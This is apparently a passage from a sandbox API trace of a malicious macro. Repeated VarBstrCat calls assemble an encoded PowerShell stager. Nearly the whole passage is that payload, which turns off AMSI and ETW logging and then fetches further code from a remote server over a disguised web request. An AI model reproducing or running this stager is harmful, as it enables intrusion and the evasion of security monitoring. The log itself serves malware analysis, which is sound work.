AJABTAFsAJABKAF0APQAkAFMAWwAkAEoAXQAsACQAUwBbACQAXwBdAH0AOwAkAEQAfAAlAHsAJABJAD0AKAAkAEkAKwAxACkAJQAyADUANgA7ACQASAA9ACgAJABIACsAJABTAFsAJABJAF0AKQAlADIANQA2ADsAJABTAFsAJABJAF0ALAAkAFMAWwAkAEgAXQA9ACQAUwBbACQASABdAC", bstrRight="wAJABTAFsAJABJAF0AOwAkAF8ALQBiAHgAbwByACQAUwBbACgA", pbstrResult=0x5fff365ce0 | out: pbstrResult=0x5fff365ce0) returned 0x0 [0175.839] VarBstrCat (in: bstrLeft="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdABGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4AUABTAEUAdAB3AEwAbwBnAFAAcgBvAHYAaQBkAGUAcgAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGUAdAB3AFAAcgBvAHYAaQBkAGUAcgAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApACwAMAApADsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE4AZwBBADQAQQBDADQAQQBNAFEAQQB1AEEARABJAEEATQBnAEEANgBBAEQAZwBBAE0AQQBBADQAQQBEAEEAQQAnACkAKQApADsAJAB0AD0AJwAvAG4AZQB3AHMALgBwAGgAcAAnADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJAB3AGMALgBQAHIAbwB4AHkAPQBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEQAZQBmAGEAdQBsAHQAVwBlAGIAUAByAG8AeAB5ADsAJAB3AGMALgBQAHIAbwB4AHkALgBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AQwByAGUAZABlAG4AdABpAGEAbABDAGEAYwBoAGUAXQA6ADoARABlAGYAYQB1AGwAdABOAGUAdAB3AG8AcgBrAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7ACQAUwBjAHIAaQBwAHQAOgBQAHIAbwB4AHkAIAA9ACAAJAB3AGMALgBQAHIAbwB4AHkAOwAkAEsAPQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAHkAdABlAHMAKAAnAEkAcgBBACUAMABWAEMASgBYAEYAVwB1AFkASwAxAEUAbwBsAEcAQgA4ADcAIQA9AGQARABbAE0AfgBOAF0ALAAnACkAOwAkAFIAPQB7ACQARAAsACQASwA9ACQAQQByAGcAcwA7ACQAUwA9ADAALgAuADIANQA1ADsAMAAuAC4AMgA1ADUAfAAlAHsAJABKAD0AKAAkAEoAKwAkAFMAWwAkAF8AXQArACQASwBbACQAXwAlACQASwAuAEMAbwB1AG4AdABdACkAJQAyADUANgA7ACQAUwBbACQAXwBdACwAJABTAFsAJABKAF0APQAkAFMAWwAkAEoAXQAsACQAUwBbACQAXwBdAH0AOwAkAEQAfAAlAHsAJABJAD0AKAAkAEkAKwAxACkAJQAyADUANgA7ACQASAA9ACgAJABIACsAJABTAFsAJABJAF0AKQAlADIANQA2ADsAJABTAFsAJABJAF0ALAAkAFMAWwAkAEgAXQA9ACQAUwBbACQASABdACwAJABTAFsAJABJAF0AOwAkAF8ALQBiAHgAbwByACQAUwBbACgA", bstrRight="JABTAFsAJABJAF0AKwAkAFMAWwAkAEgAXQApACUAMgA1ADYAXQ", pbstrResult=0x5fff365ce0 | out: pbstrResult=0x5fff365ce0) returned 0x0 [0175.839] VarBstrCat (in: bstrLeft="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdABGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4AUABTAEUAdAB3AEwAbwBnAFAAcgBvAHYAaQBkAGUAcgAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGUAdAB3AFAAcgBvAHYAaQBkAGUAcgAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApACwAMAApADsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE4AZwBBADQAQQBDADQAQQBNAFEAQQB1AEEARABJAEEATQBnAEEANgBBAEQAZwBBAE0AQQBBADQAQQBEAEEAQQAnACkAKQApADsAJAB0AD0AJwAvAG4AZQB3AHMALgBwAGgAcAAnADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJAB3AGMALgBQAHIAbwB4AHkAPQBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEQAZQBmAGEAdQBsAHQAVwBlAGIAUAByAG8AeAB5ADsAJAB3AGMALgBQAHIAbwB4AHkALgBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AQwByAGUAZABlAG4AdABpAGEAbABDAGEAYwBoAGUAXQA6ADoARABlAGYAYQB1AGwAdABOAGUAdAB3AG8AcgBrAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7ACQAUwBjAHIAaQBwAHQAOgBQAHIAbwB4AHkAIAA9ACAAJAB3AGMALgBQAHIAbwB4AHkAOwAkAEsAPQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAHkAdABlAHMAKAAnAEkAcgBBACUAMABWAEMASgBYAEYAVwB1AFkASwAxAEUAbwBsAEcAQgA4ADcAIQA9AGQARABbAE0AfgBOAF0ALAAnACkAOwAkAFIAPQB7ACQARAAsACQASwA9ACQAQQByAGcAcwA7ACQAUwA9ADAALgAuADIANQA1ADsAMAAuAC4AMgA1ADUAfAAlAHsAJABKAD0AKAAkAEoAKwAkAFMAWwAkAF8AXQArACQASwBbACQAXwAlACQASwAuAEMAbwB1AG4AdABdACkAJQAyADUANgA7ACQAUwBbACQAXwBdACwAJABTAFsAJABKAF0APQAkAFMAWwAkAEoAXQAsACQAUwBbACQAXwBdAH0AOwAkAEQAfAAlAHsAJABJAD0AKAAkAEkAKwAxACkAJQAyADUANgA7ACQASAA9ACgAJABIACsAJABTAFsAJABJAF0AKQAlADIANQA2ADsAJABTAFsAJABJAF0ALAAkAFMAWwAkAEgAXQA9ACQAUwBbACQASABdACwAJABTAFsAJABJAF0AOwAkAF8ALQBiAHgAbwByACQAUwBbACgAJABTAFsAJABJAF0AKwAkAFMAWwAkAEgAXQApACUAMgA1ADYAXQ", bstrRight="B9AH0AOwAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAo", pbstrResult=0x5fff365ce0 | out: pbstrResult=0x5fff365ce0) returned 0x0 [0175.841] VarBstrCat (in: bstrLeft="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdABGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4AUABTAEUAdAB3AEwAbwBnAFAAcgBvAHYAaQBkAGUAcgAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGUAdAB3AFAAcgBvAHYAaQBkAGUAcgAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApACwAMAApADsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE4AZwBBADQAQQBDADQAQQBNAFEAQQB1AEEARABJAEEATQBnAEEANgBBAEQAZwBBAE0AQQBBADQAQQBEAEEAQQAnACkAKQApADsAJAB0AD0AJwAvAG4AZQB3AHMALgBwAGgAcAAnADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJAB3AGMALgBQAHIAbwB4AHkAPQBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEQAZQBmAGEAdQBsAHQAVwBlAGIAUAByAG8AeAB5ADsAJAB3AGMALgBQAHIAbwB4AHkALgBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AQwByAGUAZABlAG4AdABpAGEAbABDAGEAYwBoAGUAXQA6ADoARABlAGYAYQB1AGwAdABOAGUAdAB3AG8AcgBrAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7ACQAUwBjAHIAaQBwAHQAOgBQAHIAbwB4AHkAIAA9ACAAJAB3AGMALgBQAHIAbwB4AHkAOwAkAEsAPQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAHkAdABlAHMAKAAnAEkAcgBBACUAMABWAEMASgBYAEYAVwB1AFkASwAxAEUAbwBsAEcAQgA4ADcAIQA9AGQARABbAE0AfgBOAF0ALAAnACkAOwAkAFIAPQB7ACQARAAsACQASwA9ACQAQQByAGcAcwA7ACQAUwA9ADAALgAuADIANQA1ADsAMAAuAC4AMgA1ADUAfAAlAHsAJABKAD0AKAAkAEoAKwAkAFMAWwAkAF8AXQArACQASwBbACQAXwAlACQASwAuAEMAbwB1AG4AdABdACkAJQAyADUANgA7ACQAUwBbACQAXwBdACwAJABTAFsAJABKAF0APQAkAFMAWwAkAEoAXQAsACQAUwBbACQAXwBdAH0AOwAkAEQAfAAlAHsAJABJAD0AKAAkAEkAKwAxACkAJQAyADUANgA7ACQASAA9ACgAJABIACsAJABTAFsAJABJAF0AKQAlADIANQA2ADsAJABTAFsAJABJAF0ALAAkAFMAWwAkAEgAXQA9ACQAUwBbACQASABdACwAJABTAFsAJABJAF0AOwAkAF8ALQBiAHgAbwByACQAUwBbACgAJABTAFsAJABJAF0AKwAkAFMAWwAkAEgAXQApACUAMgA1ADYAXQB9AH0AOwAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAo", bstrRight="ACIAQwBvAG8AawBpAGUAIgAsACIAQQB5AFIAQwBvAGoAcABzAG", pbstrResult=0x5fff365ce0 | out: pbstrResult=0x5fff365ce0) returned 0x0 [0175.841] VarBstrCat (in: bstrLeft="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdABGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4AUABTAEUAdAB3AEwAbwBnAFAAcgBvAHYAaQBkAGUAcgAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGUAdAB3AFAAcgBvAHYAaQBkAGUAcgAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApACwAMAApADsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE4AZwBBADQAQQBDADQAQQBNAFEAQQB1AEEARABJAEEATQBnAEEANgBBAEQAZwBBAE0AQQBBADQAQQBEAEEAQQAnACkAKQApADsAJAB0AD0AJwAvAG4AZQB3AHMALgBwAGgAcAAnADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJAB3AGMALgBQAHIAbwB4AHkAPQBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEQAZQBmAGEAdQBsAHQAVwBlAGIAUAByAG8AeAB5ADsAJAB3AGMALgBQAHIAbwB4AHkALgBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AQwByAGUAZABlAG4AdABpAGEAbABDAGEAYwBoAGUAXQA6ADoARABlAGYAYQB1AGwAdABOAGUAdAB3AG8AcgBrAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7ACQAUwBjAHIAaQBwAHQAOgBQAHIAbwB4AHkAIAA9ACAAJAB3AGMALgBQAHIAbwB4AHkAOwAkAEsAPQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAHkAdABlAHMAKAAnAEkAcgBBACUAMABWAEMASgBYAEYAVwB1AFkASwAxAEUAbwBsAEcAQgA4ADcAIQA9AGQARABbAE0AfgBOAF0ALAAnACkAOwAkAFIAPQB7ACQARAAsACQASwA9ACQAQQByAGcAcwA7ACQAUwA9ADAALgAuADIANQA1ADsAMAAuAC4AMgA1ADUAfAAlAHsAJABKAD0AKAAkAEoAKwAkAFMAWwAkAF8AXQArACQASwBbACQAXwAlACQASwAuAEMAbwB1AG4AdABdACkAJQAyADUANgA7ACQAUwBbACQAXwBdACwAJABTAFsAJABKAF0APQAkAFMAWwAkAEoAXQAsACQAUwBbACQAXwBdAH0AOwAkAEQAfAAlAHsAJABJAD0AKAAkAEkAKwAxACkAJQAyADUANgA7ACQASAA9ACgAJABIACsAJABTAFsAJABJAF0AKQAlADIANQA2ADsAJABTAFsAJABJAF0ALAAkAFMAWwAkAEgAXQA9ACQAUwBbACQASABdACwAJABTAFsAJABJAF0AOwAkAF8ALQBiAHgAbwByACQAUwBbACgAJABTAFsAJABJAF0AKwAkAFMAWwAkAEgAXQApACUAMgA1ADYAXQB9AH0AOwAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACIAQwBvAG8AawBpAGUAIgAsACIAQQB5AFIAQwBvAGoAcABzAG", bstrRight="gAbwBXAGsAdQB5AD0ASwA2ADUAYgBYAEMARgBGAHMAKwBHAGgA", pbstrResult=0x5fff365ce0 | out: pbstrResult=0x5fff365ce0) returned 0x0 [0175.841] VarBstrCat (in: bstrLeft="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdABGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4AUABTAEUAdAB3AEwAbwBnAFAAcgBvAHYAaQBkAGUAcgAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGUAdAB3AFAAcgBvAHYAaQBkAGUAcgAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApACwAMAApADsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE4AZwBBADQAQQBDADQAQQBNAFEAQQB1AEEARABJAEEATQBnAEEANgBBAEQAZwBBAE0AQQBBADQAQQBEAEEAQQAnACkAKQApADsAJAB0AD0AJwAvAG4AZQB3AHMALgBwAGgAcAAnADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAnAFUAcwBlAHIA